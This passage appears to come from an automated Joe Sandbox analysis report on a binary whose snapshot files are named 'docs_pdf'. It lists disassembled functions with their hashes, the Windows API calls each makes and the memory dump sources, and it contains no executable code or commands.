                                    • Opcode ID: bb2c98704a79b2e2161f7484c674db8dcf217529c1ce570df4a3202200c2cfa3
                                    • Instruction ID: 11b84c8a4376bc3c1ee13a4e0be8a6776333d5e8a22f2b6269e2d1d57d64393b
                                    • Opcode Fuzzy Hash: bb2c98704a79b2e2161f7484c674db8dcf217529c1ce570df4a3202200c2cfa3
                                    • Instruction Fuzzy Hash: 4ED01774A10727CFDB209F36E918A0776E9AF06255F11C87EE4CADA514EBB4D4C0CB51
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d04d7eedd4a1560146ecad642ef615050f4085ce0a85eeb1d45256b918774477
                                    • Instruction ID: 2cf5d92631d96653318945c993f3ce04940bfb99227477000c4a0226643a15ab
                                    • Opcode Fuzzy Hash: d04d7eedd4a1560146ecad642ef615050f4085ce0a85eeb1d45256b918774477
                                    • Instruction Fuzzy Hash: 6FC17074A00206EFEB15CF98C8849AEBBF5FF48310F114598E985EB291D735EE81CB90
                                    APIs
                                    • CharLowerBuffW.USER32(?,?), ref: 0102E3D2
                                    • CharLowerBuffW.USER32(?,?), ref: 0102E415
                                      • Part of subcall function 0102DAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0102DAD9
                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0102E615
                                    • _memmove.LIBCMT ref: 0102E628
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                    • String ID:
                                    • API String ID: 3659485706-0
                                    • Opcode ID: 287a6fe858e547e9a2e046fb3cd76f367a296e1bbdd6078ef55ec0d02a4a678f
                                    • Instruction ID: aaa9c6f21b01976c00a3bd7dfad869bd72a9d39ae6b4a4553b373e60ae5f5ba5
                                    • Opcode Fuzzy Hash: 287a6fe858e547e9a2e046fb3cd76f367a296e1bbdd6078ef55ec0d02a4a678f
                                    • Instruction Fuzzy Hash: C8C18A716083218FC754DF28C480A6ABBE4FF89714F14896EF9999B351EB34E905CF82
                                    APIs
                                    • CoInitialize.OLE32(00000000), ref: 010283D8
                                    • CoUninitialize.OLE32 ref: 010283E3
                                      • Part of subcall function 0100DA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0100DAC5
                                    • VariantInit.OLEAUT32(?), ref: 010283EE
                                    • VariantClear.OLEAUT32(?), ref: 010286BF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                    • String ID:
                                    • API String ID: 780911581-0
                                    • Opcode ID: 8064145861dae9f8d6ae116c6b4caf64762cb697357e978788463498776c6b94
                                    • Instruction ID: cd7f8842e4e10ab2137442238086ed199cf9cf7c30a79fdaaab56d4145d5eeba
                                    • Opcode Fuzzy Hash: 8064145861dae9f8d6ae116c6b4caf64762cb697357e978788463498776c6b94
                                    • Instruction Fuzzy Hash: B4A14B792047219FDB50DF19C885B5ABBE4BF89314F04844DFA9A9B3A1CB74ED04CB52
                                    APIs
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01042C7C,?), ref: 01007C32
                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01042C7C,?), ref: 01007C4A
                                    • CLSIDFromProgID.OLE32(?,?,00000000,0103FB80,000000FF,?,00000000,00000800,00000000,?,01042C7C,?), ref: 01007C6F
                                    • _memcmp.LIBCMT ref: 01007C90
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FromProg$FreeTask_memcmp
                                    • String ID:
                                    • API String ID: 314563124-0
                                    • Opcode ID: 15c7f02744d809baab3fb7bdf310203ff3be2c9a44d90c90d6be80d301b6a352
                                    • Instruction ID: fd11988f3d83b2f7c83b4b03a5eb01d9ab1eb36a3704c38039b8c499a12341d7
                                    • Opcode Fuzzy Hash: 15c7f02744d809baab3fb7bdf310203ff3be2c9a44d90c90d6be80d301b6a352
                                    • Instruction Fuzzy Hash: F2814C71A00109EFDB05DF98C884EEEB7B9FF89315F204198F546AB250DB35AE05CB60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyInitString
                                    • String ID:
                                    • API String ID: 2808897238-0
                                    • Opcode ID: 6fc351cada4ae44671c5fe00cb1bcbed6fd346b299e2ebb12a931a857ea23436
                                    • Instruction ID: c9bdd396634930e2d083cbf273ebd44c4d34239e8d48c77ec278de30c9352b7e
                                    • Opcode Fuzzy Hash: 6fc351cada4ae44671c5fe00cb1bcbed6fd346b299e2ebb12a931a857ea23436
                                    • Instruction Fuzzy Hash: 2751C334604302DAFB61AF69D890A7DB7E6AF08310F50881FE6D6CB2D1DB79A8548B01
                                    APIs
                                    • GetWindowRect.USER32(00B9D7B0,?), ref: 01039AD2
                                    • ScreenToClient.USER32(00000002,00000002), ref: 01039B05
                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01039B72
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 949bdfcccd8bb31bc61e21043a0077cf2f97a82e0895dfc0f79fdcf647418756
                                    • Instruction ID: faccd0cc6dfd7906820b55bd9ade344e6664d809b68c2cb6634d6a33a86a6e61
                                    • Opcode Fuzzy Hash: 949bdfcccd8bb31bc61e21043a0077cf2f97a82e0895dfc0f79fdcf647418756
                                    • Instruction Fuzzy Hash: E6519F34A00609EFDF65CF68D9809AE7BF9FF84324F108299F8959B291D771AD41CB90
                                    APIs
                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 01026CE4
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026CF4
                                      • Part of subcall function 00FB9997: __itow.LIBCMT ref: 00FB99C2
                                      • Part of subcall function 00FB9997: __swprintf.LIBCMT ref: 00FB9A0C
                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01026D58
                                    • WSAGetLastError.WSOCK32(00000000), ref: 01026D64
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLast$__itow__swprintfsocket
                                    • String ID:
                                    • API String ID: 2214342067-0
                                    • Opcode ID: 02a39f9c5729bda9fbda37256dcf52a574b8cd365fcddbeee61da68079eb2f21
                                    • Instruction ID: fe41ed4aff4ad4c159e76b1fe9a2392f73b530d0b89921678257606d327a14f1
                                    • Opcode Fuzzy Hash: 02a39f9c5729bda9fbda37256dcf52a574b8cd365fcddbeee61da68079eb2f21
                                    • Instruction Fuzzy Hash: 1D41F634B40210AFEB21BF25CC86F7A77E99F44B10F448058FA599B2C2DBB99C009B91
                                    APIs
                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0103F910), ref: 010267BA
                                    • _strlen.LIBCMT ref: 010267EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID:
                                    • API String ID: 4218353326-0
                                    • Opcode ID: 32f6dc0ae0842dc9edc6c8d7fc898ef8c8fdffe98c7e1109e5ecfaceca595ff2
                                    • Instruction ID: 586181ba6dd62c0300bd9fd3e2eef3872173c69b2bfb2d2221d5f131e02a92bc
                                    • Opcode Fuzzy Hash: 32f6dc0ae0842dc9edc6c8d7fc898ef8c8fdffe98c7e1109e5ecfaceca595ff2
                                    • Instruction Fuzzy Hash: F4412270A00115ABCB14EBA5DCC0FEEB7EDEF48310F148269F9569B292DB79AD04CB50
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0101BB09
                                    • GetLastError.KERNEL32(?,00000000), ref: 0101BB2F
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0101BB54
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0101BB80
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    • Opcode ID: 5de1be9948b0b215b9f485a0d8af7b1aea49a7f6356fb352cc73f73226b955e2
                                    • Instruction ID: db5257fd72f0c5a9b71e051d284502c7a91f2473746967a5eec34add5b41c213
                                    • Opcode Fuzzy Hash: 5de1be9948b0b215b9f485a0d8af7b1aea49a7f6356fb352cc73f73226b955e2
                                    • Instruction Fuzzy Hash: E3413939600611DFCB21EF19C584A9DBBF1EF49310B098488E98A9B766CB78FD01DF91
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 01038B4D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    • Opcode ID: c210e1e644501009bb3b9499e9767a0e27499e7fc1164becb1eee01157b7f6b0
                                    • Instruction ID: 9be9f5c35bc60fdb54fe25b57cc8fb7a5dccdd51cdc819c116b1fb0a87a1deb7
                                    • Opcode Fuzzy Hash: c210e1e644501009bb3b9499e9767a0e27499e7fc1164becb1eee01157b7f6b0
                                    • Instruction Fuzzy Hash: 9231B2B4600206BEFB699E28CC45FA93BACEB85310F14C7C3FBD1D6291C635A5408B51
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0103AE1A
                                    • GetWindowRect.USER32(?,?), ref: 0103AE90
                                    • PtInRect.USER32(?,?,0103C304), ref: 0103AEA0
                                    • MessageBeep.USER32(00000000), ref: 0103AF11
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    • Opcode ID: d93df618baa6793ebc43a82435591f803931374762e7fec41e7069f95f82d5ec
                                    • Instruction ID: 5e5dc0f87029eeaa986ef3d6ffce56eb500cbbf1fcd884fafc9375d1c2f95a25
                                    • Opcode Fuzzy Hash: d93df618baa6793ebc43a82435591f803931374762e7fec41e7069f95f82d5ec
                                    • Instruction Fuzzy Hash: 67418E70B00119DFDB61CF58C484AA97BF9FB89340F1881A9E5D5DB255D732A842CF60
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01011037
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 01011053
                                    • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 010110B9
                                    • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 0101110B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: ff6cda3f6a61c7b6447490bc8b823ab39c3b60bb726aee1eab73af6caccbb221
                                    • Instruction ID: e498dac058bd7ada17558b6ce664751585a275ab511fbebb5e3e8ed5769469ac
                                    • Opcode Fuzzy Hash: ff6cda3f6a61c7b6447490bc8b823ab39c3b60bb726aee1eab73af6caccbb221
                                    • Instruction Fuzzy Hash: 9E311630F44698AAFB3A8A799C04BF9BBE9AB45310F04429AF7C0521D9C3BD45848792
                                    APIs
                                    • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 01011176
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 01011192
                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 010111F1
                                    • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 01011243
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: a9372479da1e6ea101f4989bfdaf7c3b461736611a70be3800bdd74ac4f01315
                                    • Instruction ID: 67966cee9ae8c42b9805810c081560e2422f04b9894a649d61a54a9dcbd703dd
                                    • Opcode Fuzzy Hash: a9372479da1e6ea101f4989bfdaf7c3b461736611a70be3800bdd74ac4f01315
                                    • Instruction Fuzzy Hash: BA314870E4060DAAFF398A798804BFEBBFAAB49310F04439AF6C0921D9D33D45958751
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FE644B
                                    • __isleadbyte_l.LIBCMT ref: 00FE6479
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FE64A7
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FE64DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: 669b8879782f318fb99a82c093cc1c861932e11f7bd7785c19305e875015dcd9
                                    • Instruction ID: 64111632fc3e81b9386bf119b6d34e3d7310db90b9bf0dc6b23d2f87dfd98312
                                    • Opcode Fuzzy Hash: 669b8879782f318fb99a82c093cc1c861932e11f7bd7785c19305e875015dcd9
                                    • Instruction Fuzzy Hash: C631C131A0028EAFDB21CF66CC45BAA7BAAFF513A0F154429F854C71D1D735D850EB91
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 01035189
                                      • Part of subcall function 0101387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 01013897
                                      • Part of subcall function 0101387D: GetCurrentThreadId.KERNEL32 ref: 0101389E
                                      • Part of subcall function 0101387D: AttachThreadInput.USER32(00000000,?,010152A7), ref: 010138A5
                                    • GetCaretPos.USER32(?), ref: 0103519A
                                    • ClientToScreen.USER32(00000000,?), ref: 010351D5
                                    • GetForegroundWindow.USER32 ref: 010351DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: 187ff2ecc9e5410877a4361b9ea207d90ba4b3beed5fb0b783ba2b26f5c1c639
                                    • Instruction ID: 4de1749d365dee4bab6466be32a8ec00151ba04aae871a05c23c87fba2676c4b
                                    • Opcode Fuzzy Hash: 187ff2ecc9e5410877a4361b9ea207d90ba4b3beed5fb0b783ba2b26f5c1c639
                                    • Instruction Fuzzy Hash: F5313A72900109ABDB00EFA6CC859EEB7FDEF99300F10406AE541E7241EA799A00CBA1
                                    APIs
                                      • Part of subcall function 00FB2612: GetWindowLongW.USER32(?,000000EB), ref: 00FB2623
                                    • GetCursorPos.USER32(?), ref: 0103C7C2
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FEBBFB,?,?,?,?,?), ref: 0103C7D7
                                    • GetCursorPos.USER32(?), ref: 0103C824
                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FEBBFB,?,?,?), ref: 0103C85E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                    • String ID:
                                    • API String ID: 2864067406-0
                                    • Opcode ID: 968c5c16f4db7deb7560e1b33e60c6ebb461cc3cb0e7ac74a92df30075f5f5bb
                                    • Instruction ID: a7927db47a34600a33f818d9721378337a233055d03e9dcf96f0c0e2d335cfa5
                                    • Opcode Fuzzy Hash: 968c5c16f4db7deb7560e1b33e60c6ebb461cc3cb0e7ac74a92df30075f5f5bb
                                    • Instruction Fuzzy Hash: 8A31A535600018AFEB65CF59C898EEA7FFAFB49320F04419AFA85D7251C7365A50DF60
                                    APIs
                                      • Part of subcall function 01008652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 01008669
                                      • Part of subcall function 01008652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 01008673
                                      • Part of subcall function 01008652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 01008682
                                      • Part of subcall function 01008652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 01008689
                                      • Part of subcall function 01008652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0100869F
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 01008BEB
                                    • _memcmp.LIBCMT ref: 01008C0E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01008C44
                                    • HeapFree.KERNEL32(00000000), ref: 01008C4B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                     • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                    • String ID:
                                    • API String ID: 1592001646-0
                                    • Opcode ID: ac7e5507f8c06e5a62305c4898c4746458ab8de9f201b62a4428d729cff9fce3
                                    • Instruction ID: 0754a1568dea7e0fcd3c82350947af972476862b8f7e98df1b872bdc0b183345
                                    • Opcode Fuzzy Hash: ac7e5507f8c06e5a62305c4898c4746458ab8de9f201b62a4428d729cff9fce3
                                    • Instruction Fuzzy Hash: 79218D71E01209ABEB11CF98C944BEEBBF8FF44350F08809AE595A7280D731AA05CB51
                                    APIs
                                    • __setmode.LIBCMT ref: 00FD0BF2
